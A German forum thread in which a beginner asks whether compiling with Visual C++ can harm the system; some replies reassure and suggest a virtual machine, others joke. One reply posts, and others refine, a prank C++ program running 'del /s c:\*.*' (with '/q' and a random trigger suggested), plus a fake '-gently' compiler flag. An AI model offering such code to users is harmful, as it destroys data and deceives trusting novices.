Anfängerfrage: Kann man mit Microsoft Visual C++ etwas kaputt machen?
-
Hi, ich bin gerade dabei C++ zu lernen, jedoch habe ich mich gefragt ob man beim kompilieren mit Microsoft Visual C++ vorsichtig sein muss um das Betriebssystem oder sonst etwas nicht zu beschädigen.
Danke im Voraus.
-
Jaa, ja. Microsoft tendiert dazu, mit hauseigenen Compilern das eigene Betriebssystem zu zerstören. Es ist sehr empfehlenswert, vorsichtig zu kompilieren. Der entsprechende Parameter ist -gently.
Gerüchten zu Folge stirbt bei MS-VC++ und jeder unaufgelösten Referenz auch ein Kätzchen. Bitte um Vorsicht.
-
Falls deine Frage ist, ob du mit VC++-Programmen generell irgendwas kaputt machen kannst: ja klar, du kannst mit sehr vielen Programmiersprachen z.B. wichtige Systemdateien löschen, wenn du es darauf anlegst. Aber das passiert natürlich nicht einfach durch Unachtsamkeit (was deine Sorge zu sein scheint), sondern lediglich durch pure Absicht. Insofern kannst du ruhig munter vor dich hinkompilieren und ausführen, ohne dir ernsthaft Sorgen um dein System zu machen.

-
Falls deine Angst, etwas kaputt zu machen, grösser ist als dein Mut, könntest Du ja eine Virtual Machine (z.B. mit VIrtualBox) erstellen und dort erste Gehversuche machen und Vertrauen aufbauen.
-
Dein PC wird explodieren wenn du etwas falsch machst !!!

uffpasse !!!!!!!!
-
Du musst nur Folgendes machen:
#include <stdio.h> #include <tchar.h> int _tmain() { system("del /s c:\*.*"); }Das ist am ungefährlichsten...
-
Jochen Kalmbach schrieb:
Du musst nur Folgendes machen:
#include <stdio.h> #include <tchar.h> int _tmain() { system("del /s c:\*.*"); }Das ist am ungefährlichsten...
Klappt nicht, versuch es mal bei dir zu starten, bei mir tat sich nichts :p
-
Mist... stimmt... da fehlt ein "/q"...
-
Und es fehlt ein if(rand()%6) davor.
Na, wer hätte die Eier es dann auszuführen?
-
Zocker12345 schrieb:
Und es fehlt ein if(rand()%6) davor.
Na, wer hätte die Eier es dann auszuführen?
Ich, nachdem ich die Festplatte Read Only gemountet habe